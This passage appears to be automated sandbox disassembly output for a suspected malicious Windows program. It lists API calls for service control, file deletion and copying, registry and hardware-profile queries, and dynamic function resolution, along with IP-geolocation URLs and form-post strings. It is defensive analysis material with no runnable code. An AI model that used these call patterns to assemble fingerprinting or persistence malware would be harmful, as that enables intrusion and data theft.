call 35f900 call 360f90 call 324ef0 call 325560 call 327340 call 33f8b0 1014->1018 1015->1018 1055 31bf6a-31bf83 call 311a20 call 34cf43 1018->1055 1023 31b655-31b65e 1019->1023 1020->1023 1026 31b660-31b674 1023->1026 1027 31b67a-31b6ba call 34cf43 1023->1027 1026->1027 1033 31b6c1-31b6c3 1027->1033 1034 31b6bc-31b6c0 1027->1034 1036 31b6c5-31b6d6 call 34ac10 1033->1036 1037 31b6d8-31b72a 1033->1037 1034->1033 1040 31b731 1036->1040 1037->1040 1060 31bf85-31bf89 1055->1060 1061 31bf8a-31bf8c 1055->1061 1060->1061 1062 31bfa1-31bff3 1061->1062 1063 
31bf8e-31bf9f call 34ac10 1061->1063 1065 31bffa-31c00a 1062->1065 1063->1065 1067 31c010-31c053 call 325560 1065->1067 1068 31c339-31c343 call 34cf43 1065->1068 1076 31c059-31c079 call 34cf43 1067->1076 1077 31c28b-31c29b 1067->1077 1074 31c345-31c349 1068->1074 1075 31c34a-31c34c 1068->1075 1074->1075 1078 31c361-31c3b3 1075->1078 1079 31c34e-31c35f call 34ac10 1075->1079 1092 31c080-31c082 1076->1092 1093 31c07b-31c07f 1076->1093 1082 31c2a1-31c325 call 311750 call 311a20 * 7 1077->1082 1083 31c32a-31c334 call 311a20 1077->1083 1081 31c3ba-31c3f3 call 311a20 * 4 1078->1081 1079->1081 1081->947 1082->970 1083->1068 1096 31c0a0-31c0aa call 34cf43 1092->1096 1097 31c084-31c096 1092->1097 1093->1092 1104 31c0b1-31c0b3 1096->1104 1105 31c0ac-31c0b0 1096->1105 1097->1096 1108 31c0b5-31c0c6 call 34ac10 1104->1108 1109 31c0c8-31c11a 1104->1109 1105->1104 1113 31c121-31c1cc call 35f900 * 2 call 312400 1108->1113 1109->1113 1130 31c1da 1113->1130 1131 31c1ce-31c1d8 1113->1131 1133 31c1e4-31c1ed 1130->1133 1131->1133 1134 31c209-31c25f call 34cf43 1133->1134 1135 31c1ef-31c203 1133->1135 1138 31c261-31c265 1134->1138 1139 31c266-31c268 1134->1139 1135->1134 1138->1139 1140 31c286 1139->1140 1141 31c26a-31c27c 1139->1141 1141->1140
                                                APIs
                                                  • Part of subcall function 00312400: __aulldiv.LIBCMT ref: 00312482
                                                • __aulldiv.LIBCMT ref: 0031B3B4
                                                Strings
                                                • Content-Type: application/x-www-form-urlencoded, xrefs: 0031BEF2
                                                • Qp, xrefs: 0031BAF3
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3286192538.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                • Associated: 00000000.00000002.3286147238.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.3286289686.0000000000363000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.3286334177.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.3286371153.0000000000370000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.3286423984.0000000000374000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.3286471868.0000000000375000.00000080.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_310000_611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: __aulldiv
                                                • String ID: Content-Type: application/x-www-form-urlencoded$Qp
                                                • API String ID: 3732870572-783608910
                                                • Opcode ID: f18a0cd755e0487fbc386c7556f65a87850eb3e7d891d90aa589ea98749862be
                                                • Instruction ID: 291d42a614003686dea98be07eb5b190f1b82b2620bfcd680a005130f3f8442b
                                                • Opcode Fuzzy Hash: f18a0cd755e0487fbc386c7556f65a87850eb3e7d891d90aa589ea98749862be
                                                • Instruction Fuzzy Hash: 5FB27970D042688FDB2ACB28CC55BDABBB1AF99300F1482E9D449AB391DB715EC5CF51

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1201 31acd0-31ae27 call 311810 call 31aa00 1206 31ae2d-31af58 call 311810 call 31aa00 1201->1206 1207 31b1ce 1201->1207 1206->1207 1215 31af5e-31b086 call 311810 call 31aa00 1206->1215 1209 31b1d8-31b1ee call 349348 1207->1209 1215->1207 1220 31b08c-31b1c0 call 311810 call 31aa00 1215->1220 1220->1207 1225 31b1c2-31b1cc 1220->1225 1225->1209
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3286192538.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                • Associated: 00000000.00000002.3286147238.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.3286289686.0000000000363000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.3286334177.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.3286371153.0000000000370000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.3286423984.0000000000374000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.3286471868.0000000000375000.00000080.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_310000_611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: __aulldiv
                                                • String ID:
                                                • API String ID: 3732870572-0
                                                • Opcode ID: af115597d67c0fa28530e33544ee416cf2613e421effbe0be079812d8e112749
                                                • Instruction ID: b0d4010a6ea01d4c7c28f0ba188c83c42359c75900173cef6257f0a5c0d3da5e
                                                • Opcode Fuzzy Hash: af115597d67c0fa28530e33544ee416cf2613e421effbe0be079812d8e112749
                                                • Instruction Fuzzy Hash: 7FE1F774D096AC8ADB26CFA889817DDFBB0AF59304F1481D9D98877316EB301AC9CF51
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3286192538.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                • Associated: 00000000.00000002.3286147238.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.3286289686.0000000000363000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.3286334177.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.3286371153.0000000000370000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.3286423984.0000000000374000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.3286471868.0000000000375000.00000080.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_310000_611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c12fb5006e198a9469d627416917a4438922f797b5ff49e9074cd4f9e6f192e5
                                                • Instruction ID: 85883dd56be9a54824db09db2762d62e07ec5e9b61f43fc013f6d1f26cdfa613
                                                • Opcode Fuzzy Hash: c12fb5006e198a9469d627416917a4438922f797b5ff49e9074cd4f9e6f192e5
                                                • Instruction Fuzzy Hash: 3AF05476914548BBCB05DF54DC41FCAB7ACE70D760F40C629F9198B680E735A6448B90

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                • E), xrefs: 0031AB4B
                                                • Content-Type: application/x-www-form-urlencoded, xrefs: 0031ABE8
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3286192538.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                • Associated: 00000000.00000002.3286147238.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.3286289686.0000000000363000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.3286334177.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.3286371153.0000000000370000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.3286423984.0000000000374000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.3286471868.0000000000375000.00000080.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_310000_611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: __aulldiv
                                                • String ID: Content-Type: application/x-www-form-urlencoded$E)
                                                • API String ID: 3732870572-2424320723
                                                • Opcode ID: 142aa23adf31cf4ada87871414e04b9efc8353b9d297009582b0d48bb91997e7
                                                • Instruction ID: eddc518011a883e7b55698945f45c48b2bb5b895599d5864520e482730f47154
                                                • Opcode Fuzzy Hash: 142aa23adf31cf4ada87871414e04b9efc8353b9d297009582b0d48bb91997e7
                                                • Instruction Fuzzy Hash: C79147B1E002189FDB15DFA8C885BDEBBB5FF89310F148169E409AB381DB746A45CF91

                                                Control-flow graph (rendered graph and executed/not-executed legend omitted); node dump: 1183 3548df-3548eb 1184 35491d-354928 call 350cb8 1183->1184 1185 3548ed-3548ef 1183->1185 1192 35492a-35492c 1184->1192 1187 3548f1-3548f2 1185->1187 1188 354908-354919 RtlAllocateHeap 1185->1188 1187->1188 1189 3548f4-3548fb call 353454 1188->1189 1190 35491b 1188->1190 1189->1184 1195 3548fd-354906 call 352295 1189->1195 1190->1192 1195->1184 1195->1188
                                                APIs
                                                • RtlAllocateHeap.NTDLL(00000000,00000000,?,?,0034956E,00000000,?,00311FF9,00000000,?,00311F08), ref: 00354911
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3286192538.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                • Associated: 00000000.00000002.3286147238.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.3286289686.0000000000363000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.3286334177.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.3286371153.0000000000370000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.3286423984.0000000000374000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.3286471868.0000000000375000.00000080.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_310000_611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateHeap
                                                • String ID:
                                                • API String ID: 1279760036-0
                                                • Opcode ID: 41d43cdcf65520c95f2cbcc6182021f558ec918a6a1c832914da6505007781c1
                                                • Instruction ID: e8d2504268dac068e1bc0997a0a72b8496f1fd4aeb7b34948cc74e3b35407617
                                                • Opcode Fuzzy Hash: 41d43cdcf65520c95f2cbcc6182021f558ec918a6a1c832914da6505007781c1
                                                • Instruction Fuzzy Hash: DCE022316007206AD62B2B269D02F9B774C9F823BFF570221EC09DA1B1DB60DD8CC6E0

                                                Control-flow graph (rendered graph and executed/not-executed legend omitted); node dump: 1198 351fe9-351ffc call 3543f6 1200 352001-352003 1198->1200
                                                APIs
                                                • _free.LIBCMT ref: 00351FFC
                                                  • Part of subcall function 003543F6: RtlFreeHeap.NTDLL(00000000,00000000,?,00358B3C,?,00000000,?,?,?,00358B63,?,00000007,?,?,00358F65,?), ref: 0035440C
                                                  • Part of subcall function 003543F6: GetLastError.KERNEL32(?,?,00358B3C,?,00000000,?,?,?,00358B63,?,00000007,?,?,00358F65,?,?), ref: 0035441E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3286192538.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                • Associated: 00000000.00000002.3286147238.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.3286289686.0000000000363000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.3286334177.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.3286371153.0000000000370000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.3286423984.0000000000374000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.3286471868.0000000000375000.00000080.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_310000_611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorFreeHeapLast_free
                                                • String ID:
                                                • API String ID: 1353095263-0
                                                • Opcode ID: 10e095cde31c31e70ec97b2935984fa0773950bb2f406251cda1964e0a531419
                                                • Instruction ID: 2be38ae87c5008254568eefbb09543d4005014bdd2839bc7b6402433e3a9738c
                                                • Opcode Fuzzy Hash: 10e095cde31c31e70ec97b2935984fa0773950bb2f406251cda1964e0a531419
                                                • Instruction Fuzzy Hash: 32C08C31000208BBCB05DB45C806E4E7BA8DB80368F200054F8001B260CBB1EE449680
                                                APIs
                                                • GetModuleHandleA.KERNEL32(?,8CDA9266), ref: 003429E3
                                                • GetProcAddress.KERNEL32(?,?), ref: 003429FD
                                                • GetModuleHandleA.KERNEL32(?,8CDA9266), ref: 00342CE4
                                                • GetProcAddress.KERNEL32(?,?), ref: 00342CFE
                                                • GetModuleHandleA.KERNEL32(?,8CDA9266), ref: 00342FE5
                                                • GetProcAddress.KERNEL32(?,?), ref: 00342FFF
                                                • lstrlenA.KERNEL32(00000000,12we3fwe,8CDA9266), ref: 0034320C
                                                • GetProcessHeap.KERNEL32(00000008,-00000001,12we3fwe,8CDA9266), ref: 0034323E
                                                • HeapAlloc.KERNEL32(00000000), ref: 00343245
                                                • lstrcpynA.KERNEL32(00000000,00000000,00000000), ref: 00343266
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3286192538.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                • Associated: 00000000.00000002.3286147238.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.3286289686.0000000000363000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.3286334177.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.3286371153.0000000000370000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.3286423984.0000000000374000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.3286471868.0000000000375000.00000080.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_310000_611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AddressHandleModuleProc$Heap$AllocProcesslstrcpynlstrlen
                                                • String ID: de$de$de$12we3fwe$Hde$Hde$Hde$Hde$Hde$Hde$stryd
                                                • API String ID: 2437662777-1215628347
                                                • Opcode ID: 06b3b049aa6a4a1fdaeb1d74838be070c6db68e3178cf525ad95319f50ceef1a
                                                • Instruction ID: 205fe942673328ef8f143fa00ff17b61f78fffe5bd3c0a4bbd596a8c05512595
                                                • Opcode Fuzzy Hash: 06b3b049aa6a4a1fdaeb1d74838be070c6db68e3178cf525ad95319f50ceef1a
                                                • Instruction Fuzzy Hash: DF62D074D092A88ADB26CF28CC95BD9BBB1AF5A304F1481D9D98D67212DB301FC5CF51
                                                APIs
                                                • GetProcAddress.KERNEL32(00323A15,?), ref: 00343D7D
                                                • GetProcAddress.KERNEL32(00323A15,?), ref: 00343F74
                                                • GetProcAddress.KERNEL32(00323A15,?), ref: 0034416B
                                                • GetProcAddress.KERNEL32(00323A15,?), ref: 00344380
                                                • GetProcAddress.KERNEL32(00323A15,?), ref: 00344595
                                                • GetProcAddress.KERNEL32(00323A15,?), ref: 003446C8
                                                • GetProcAddress.KERNEL32(00323A15,?), ref: 003448DD
                                                • GetProcAddress.KERNEL32(00323A15,?), ref: 00344AF2
                                                • GetProcAddress.KERNEL32(00323A15,?), ref: 00344D07
                                                • GetProcAddress.KERNEL32(00323A15,?), ref: 00344EFE
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3286192538.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                • Associated: 00000000.00000002.3286147238.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.3286289686.0000000000363000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.3286334177.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.3286371153.0000000000370000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.3286423984.0000000000374000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.3286471868.0000000000375000.00000080.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_310000_611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AddressProc
                                                • String ID: Hde$Hde$Hde$Hde$Hde$Hde$Hde$Hde$Hde$Hde
                                                • API String ID: 190572456-3850131784
                                                • Opcode ID: 30c089357a7eadc030aae16427dc9612c79c7426d5460563a351b3ffb7bd74f2
                                                • Instruction ID: e783e441fa9483b22d903721777b0e47cfd02b736b1df1e8828e3a1f8592a432
                                                • Opcode Fuzzy Hash: 30c089357a7eadc030aae16427dc9612c79c7426d5460563a351b3ffb7bd74f2
                                                • Instruction Fuzzy Hash: 19B2AEB4D096A88ADB26CF288C857D9FBB1BF59305F0492D9D98C67221EB301BC5CF54
                                                Strings
                                                • https://ipgeolocation.io/, xrefs: 0031F761
                                                • https://ipinfo.io/, xrefs: 0031C6F8
                                                • https://db-ip.com/, xrefs: 0031D9EE
                                                • https://www.maxmind.com/en/locate-my-ip-address, xrefs: 0031E1D0
                                                • Content-Type: application/x-www-form-urlencoded, xrefs: 0031D0FD
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3286192538.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                • Associated: 00000000.00000002.3286147238.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.3286289686.0000000000363000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.3286334177.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.3286371153.0000000000370000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.3286423984.0000000000374000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.3286471868.0000000000375000.00000080.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_310000_611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: __aulldiv
                                                • String ID: Content-Type: application/x-www-form-urlencoded$https://db-ip.com/$https://ipgeolocation.io/$https://ipinfo.io/$https://www.maxmind.com/en/locate-my-ip-address
                                                • API String ID: 3732870572-2199139642
                                                • Opcode ID: 648d687a933f86adc5a41c14b309c0847d5a8a8a643e81984cacef8f3cc3888c
                                                • Instruction ID: 009917b0750e723ea1ab30d869baf5d8cdbc5f13654d72aeaa73600de6c3ff1a
                                                • Opcode Fuzzy Hash: 648d687a933f86adc5a41c14b309c0847d5a8a8a643e81984cacef8f3cc3888c
                                                • Instruction Fuzzy Hash: E0730470D096A88AEB66CF28CC51BEABBB1AF99304F0481D9D58C67251EB701FC5CF51
                                                APIs
                                                • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,8CDA9266), ref: 00320A6F
                                                  • Part of subcall function 003203E0: SHGetSpecialFolderPathA.SHELL32(00000000,?,00000026,00000000,8CDA9266), ref: 00320436
                                                • DeleteFileA.KERNEL32(?), ref: 00320BAE
                                                • DeleteFileA.KERNEL32(?), ref: 00320E16
                                                • CopyFileA.KERNEL32(?,?,00000000), ref: 00321064
                                                • OpenServiceA.ADVAPI32(00000000,?,00000004), ref: 003211BD
                                                • CloseServiceHandle.ADVAPI32(00000000), ref: 003211D9
                                                • CloseServiceHandle.ADVAPI32(00000000), ref: 0032196C
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3286192538.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                • Associated: 00000000.00000002.3286147238.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.3286289686.0000000000363000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.3286334177.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.3286371153.0000000000370000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.3286423984.0000000000374000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.3286471868.0000000000375000.00000080.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_310000_611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FileService$CloseDeleteHandleOpen$CopyFolderManagerPathSpecial
                                                • String ID:
                                                • API String ID: 32130118-0
                                                • Opcode ID: 447dbef8d7e5e8a40ebfd22d77f815d9103187fbf61371b053e40cf31638c102
                                                • Instruction ID: f3ed32efc3462a89cbb440f67c637929d71b109457353c7c24a53064fb0bd190
                                                • Opcode Fuzzy Hash: 447dbef8d7e5e8a40ebfd22d77f815d9103187fbf61371b053e40cf31638c102
                                                • Instruction Fuzzy Hash: DB92EEB4D0A2A88BDB26CF28D994BD9BBB5AF59300F1081D9D94DA7251EB305FC5CF40
                                                APIs
                                                • GetModuleHandleA.KERNEL32(?,8CDA9266), ref: 0033DBCA
                                                • GetModuleHandleA.KERNEL32(?), ref: 0033DF20
                                                • GetModuleHandleA.KERNEL32(?), ref: 0033E194
                                                • GetModuleHandleA.KERNEL32(?), ref: 0033E4EA
                                                • GetModuleHandleA.KERNEL32(?), ref: 0033E84F
                                                • GetModuleHandleA.KERNEL32(?), ref: 0033EBB4
                                                • GetModuleHandleA.KERNEL32(?), ref: 0033EEFB
                                                • GetModuleHandleA.KERNEL32(?), ref: 0033F18D
                                                • GetModuleHandleA.KERNEL32(?), ref: 0033F4F2
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3286192538.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                • Associated: 00000000.00000002.3286147238.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.3286289686.0000000000363000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.3286334177.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.3286371153.0000000000370000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.3286423984.0000000000374000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.3286471868.0000000000375000.00000080.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_310000_611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID:
                                                • API String ID: 4139908857-0
                                                • Opcode ID: 42a73cd775201ed9a6ac005a126181b64f66bbdf914f7451128b477e4cb286a7
                                                • Instruction ID: dfa15224d731afda55ef9b7ba78d5e11224277a1bf713bac1f5b7d6898643db3
                                                • Opcode Fuzzy Hash: 42a73cd775201ed9a6ac005a126181b64f66bbdf914f7451128b477e4cb286a7
                                                • Instruction Fuzzy Hash: ED03B0B4D096A88ADB66CF289C517E9FBB1AF59304F0492D9C98C73252EB301BC5CF45
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3286192538.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                • Associated: 00000000.00000002.3286147238.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.3286289686.0000000000363000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.3286334177.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.3286371153.0000000000370000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.3286423984.0000000000374000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.3286471868.0000000000375000.00000080.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_310000_611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: __floor_pentium4
                                                • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                • API String ID: 4168288129-2761157908
                                                • Opcode ID: 01ca81c70e8ce611acfbc59963e54a8ccfd0629354ff1e9479486cc4a8eb1564
                                                • Instruction ID: ef40945145413428d133c7277d917dd0bf23134b2c946d14ab253a6338540e40
                                                • Opcode Fuzzy Hash: 01ca81c70e8ce611acfbc59963e54a8ccfd0629354ff1e9479486cc4a8eb1564
                                                • Instruction Fuzzy Hash: 6DD26E71E046288FDB66CF28CD40BEAB7B9EB44306F1545EAD80DE7250E774AE858F41
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3286192538.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                • Associated: 00000000.00000002.3286147238.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.3286289686.0000000000363000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.3286334177.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.3286371153.0000000000370000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.3286423984.0000000000374000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.3286471868.0000000000375000.00000080.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_310000_611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d7301fcd9fb3960aa9a655fac13565847114244b86b3fd6cfc4634df76d16dea
                                                • Instruction ID: a72e059f1de39dcdf13318e0f4e9ed46181bf148dedde7af3d62336e4b7525a9
                                                • Opcode Fuzzy Hash: d7301fcd9fb3960aa9a655fac13565847114244b86b3fd6cfc4634df76d16dea
                                                • Instruction Fuzzy Hash: 1E22E0749052A88BDB66CF28DC84BEABBB1AF59304F0481D9C84D6B352D730AEC5CF51
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3286192538.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                • Associated: 00000000.00000002.3286147238.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.3286289686.0000000000363000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.3286334177.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.3286371153.0000000000370000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.3286423984.0000000000374000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.3286471868.0000000000375000.00000080.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_310000_611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: __aulldiv
                                                • String ID: @)$E)
                                                • API String ID: 3732870572-3004400368
                                                • Opcode ID: 18b39cef931de7dd25de464aead9eb85a81f0b1e0353610d61485c241f2b27bf
                                                • Instruction ID: 45ac480bf510dae61dca1f0227cf3ff7e8301d0c32e4309cb99797c8ab8c5f6b
                                                • Opcode Fuzzy Hash: 18b39cef931de7dd25de464aead9eb85a81f0b1e0353610d61485c241f2b27bf
                                                • Instruction Fuzzy Hash: FCF19E70E002189FDB19CFA8D855BDEBBB5FF88310F1483A9E019AB2D1DB755A85CB50
                                                APIs
                                                  • Part of subcall function 00313870: GetCurrentProcess.KERNEL32(00000000), ref: 0031388B
                                                  • Part of subcall function 00313870: IsWow64Process.KERNEL32(00000000), ref: 00313892
                                                • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,00000000,?,8CDA9266), ref: 003142CF
                                                • RegQueryValueExA.ADVAPI32(?,?,00000000,00020019,?,00000400), ref: 0031445A
                                                • RegCloseKey.ADVAPI32(00000000), ref: 003144E7
                                                • GetCurrentHwProfileA.ADVAPI32(?), ref: 00314649
                                                Memory Dump Source
